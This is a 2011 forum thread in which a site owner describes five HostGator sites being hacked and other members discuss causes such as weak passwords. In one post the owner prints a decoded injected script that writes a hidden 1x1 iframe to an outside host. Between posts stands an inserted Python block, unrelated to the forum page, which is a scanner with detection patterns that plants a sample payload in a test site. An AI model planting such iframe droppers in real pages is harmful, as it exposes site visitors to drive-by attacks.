
5 of my Hostgator sites just got hacked

Discussion in 'BlackHat Lounge' started by simey69, Jul 5, 2011.

  1. simey69

    simey69 Regular Member

    Joined:
    Mar 27, 2009
    Messages:
    325
    Likes Received:
    1,478
    Location:
    UK
    Hi,

    Just a warning, I just got hit on 5 of many sites hosted on HG

    Most concern for me was that my main domain got hit, the one that can access WHM also... so adding extra protection around that now

    some sites are handcoded php, others wp, one a mix of handcoded work with wp also.

    There was some encoded javascript inserted at the end of:
    index.htm
    index.php
    index.html
    wp-blog-header.php

    and htaccess got wiped on a few

    They failed, as it's throwing a server 500 instead of running.

    I'll open the javascript up later and see what it's up to and report back.

    Support at HG has been spot on, sharing some of the work fixing it.
    They said they've seen this yesterday also on another shared hosting account.

    Good luck,

    Si
     
  2. simey69

    simey69 Regular Member

    This is the javascript decoded:

    Code:
    document.write('<iframe src="http://mariacallas.us/forum.php?tp=9b149b234e593d76" width="1" height="1" frameborder="0"></iframe>')
    The site is listed under Godaddy, checking the whois gives:
    Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM

    So at least the tossers site is dead

    Si
     
  3. mccullum

    mccullum Power Member

    Joined:
    Aug 21, 2009
    Messages:
    509
    Likes Received:
    92
    Do let us know how it goes.
     
  4. xstyle

    xstyle Power Member

    Joined:
    Mar 1, 2011
    Messages:
    555
    Likes Received:
    170
    Just going to buy a host at HG.
     
  5. simey69

    simey69 Regular Member

    To be honest - never, ever had an issue with HG before, this has not busted my trust with them.

    To be fair, I'd be quite happy to say I own part blame, as the sites are quite old (5+yrs), so a bit earlier in the day for me as far as security awareness goes and the passwords were not that strong, so probably got brute forced.

    All sites cleaned, passwords changed, no signs of repeat, so all good - no lasting damage done.

    I'd recommend perhaps re-visiting your passwords and making them stronger if needed.

    Thanks,

    Si
     
  6. cashcow

    cashcow Junior Member

    Joined:
    Sep 15, 2008
    Messages:
    162
    Likes Received:
    22
    are u using wordpress? time to update to the latest version.
     
  7. bikerboy

    bikerboy Regular Member

    Joined:
    Nov 18, 2010
    Messages:
    220
    Likes Received:
    148
    Did you share the same passwords for all sites?

    Did you save your passwords in your email (the hacker accessed your email)?
     
  8. xollls

    xollls Junior Member

    Joined:
    Dec 23, 2009
    Messages:
    187
    Likes Received:
    48
    Location:
    SoCal
    Did you install any nulled scripts? Many contain backdoors.
     
  9. simey69

    simey69 Regular Member

    Two are WP sites, up to date
    Two are hand coded php
    one was a mix of handcoded with WP in the back.
    WP was not a cause here, the access was at a ftp/cpanel level

    Nope - always individual passwords per site.
    But as mentioned, they were 'softer' passwords, now changed to what WHM classes as '100/100 Strong'
    Nope - I never have passwords in emails, nor send them via email anywhere.

    Nope - I would never use them without manually going through them myself first.
    I do a fair bit of coding/decoding/nulling, so quite careful in such respects.

    If it had been a local issue relating to pc etc, then many (many!!) more would've been hit, on other hosts too.

    The attack was automated for sure - the timing of file updates was too quick to be manual.
    Basically it looks like the sites cpanel access (maybe ftp) was brute forced, then the folders crawled looking for index.(htm/html/php) login.(htm/html/php) and wp-blog-header.php. A few had the .htaccess cleared too, but not all.

    I'm confident it was related to soft passwords that had not been updated over time and were overlooked from a security perspective.
    HG support said they'd seen the same attack on another shared account the day before - I think somebody is brute forcing them.

    Thanks
    Si
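The attack pattern described above (an appended `document.write` iframe dropper at the end of index.*, login.* and wp-blog-header.php, plus wiped .htaccess files) can be checked for across a web root with a small scanner. This is an added example, not code from the thread or from HostGator; file names and patterns are taken from the posts, the sample site it builds is constructed, and the injected URL is a placeholder.

```python
import os
import re
import tempfile
from pathlib import Path

# File names the thread reports as the ones the automated attack rewrote.
TARGET_NAMES = {"index.htm", "index.html", "index.php",
                "login.htm", "login.html", "login.php", "wp-blog-header.php"}

# Indicators of the appended dropper: document.write of a 1x1 hidden iframe,
# or the obfuscation wrappers such droppers are commonly wrapped in.
SUSPECT_PATTERNS = [
    ("document.write", re.compile(r"document\.write\s*\(", re.I)),
    ("hidden iframe", re.compile(r"<iframe[^>]*(width|height)\s*=\s*[\"']?[01][\"']?", re.I)),
    ("eval/unescape", re.compile(r"\beval\s*\(\s*(unescape|atob|String\.fromCharCode)", re.I)),
]

def suspicious_tail(text, tail_chars=4000):
    """Return indicator labels matched in the last tail_chars of a file body
    (the injection in the thread was appended at the end of each file)."""
    tail = text[-tail_chars:]
    return [label for label, rx in SUSPECT_PATTERNS if rx.search(tail)]

def scan_webroot(root):
    """Walk a web root; report injected target files and emptied .htaccess files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if name == ".htaccess" and path.stat().st_size == 0:
                findings.append((str(path), "empty .htaccess"))
            elif name in TARGET_NAMES:
                hits = suspicious_tail(path.read_text(errors="replace"))
                if hits:
                    findings.append((str(path), "injected script: " + ", ".join(hits)))
    return sorted(findings)

def build_sample_site():
    """Constructed sample web root (not real data): one clean page, one
    wp-blog-header.php carrying the appended dropper, and a wiped .htaccess."""
    root = Path(tempfile.mkdtemp(prefix="hg_scan_"))
    (root / "index.php").write_text("<?php echo 'clean'; ?>\n")
    payload = ("\n<script>document.write('<iframe src=\"http://INJECTED-HOST.invalid/f.php\" "
               "width=\"1\" height=\"1\" frameborder=\"0\"></iframe>')</script>\n")
    (root / "blog").mkdir()
    (root / "blog" / "wp-blog-header.php").write_text("<?php require 'wp-load.php'; ?>" + payload)
    (root / "blog" / ".htaccess").write_text("")
    return root

if __name__ == "__main__":
    for path, reason in scan_webroot(build_sample_site()):
        print(f"{reason}: {path}")
```

Run it against the real document root instead of the sample site; a clean page at the end of its tail produces no hit, and an empty .htaccess is flagged because the thread reports them being cleared alongside the injections.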
     
  10. blogdev

    blogdev BANNED BANNED

    Joined:
    Sep 29, 2009
    Messages:
    128
    Likes Received:
    101
    Got some sites hacked on HG too, never had a problem before I moved my site there, I'm no longer using them.
     
  11. simey69

    simey69 Regular Member

    yeah, I gotta be fair to them, been with them for almost 7yrs I think.

    Never had an issue before, as above, the only thing I can see is soft'ish password use on my side.

    On their side, I would've expected some level of protection against repeated brute-forcing of log-ins.

    Si
     
  12. timothywcrane

    timothywcrane Power Member

    Joined:
    Apr 25, 2009
    Messages:
    590
    Likes Received:
    236
    Occupation:
    Internet Promotion Management
    Location:
    USA
    Never do that, and if you have, never tell anyone in a forum or other conversation that you have, even if just in the past. This is hacking also (not accusing the poster I quoted): social engineering.

    A mark as a mark is a mark. It doesn't matter if it's on the street, in business, or on a server.

    To OP, glad to hear that no perm damage was done, and thanks to the poster I quoted, as it brings up a great point.
     
  13. boosters

    boosters Regular Member

    Joined:
    Mar 27, 2011
    Messages:
    225
    Likes Received:
    62
    One of my sites was also hacked, but HG handled it so quickly that Google was unable to tell whether the site had been hacked or not. So if anyone's site has been hacked, contact HG live support immediately for better assistance.
     
  14. RightInTwo

    RightInTwo Power Member

    Joined:
    Feb 23, 2010
    Messages:
    744
    Likes Received:
    381
    Is it shared hosting? Sometimes your neighbor can get hacked and you get taken out with them.
     
  15. Evan257

    Evan257 Regular Member

    Joined:
    May 24, 2009
    Messages:
    401
    Likes Received:
    54
    Location:
    Toronto ON
    Happened to me a month ago with Hostgator. One of my microniche mfa sites slipped to the second page. :(
    I bet it was wordpress right?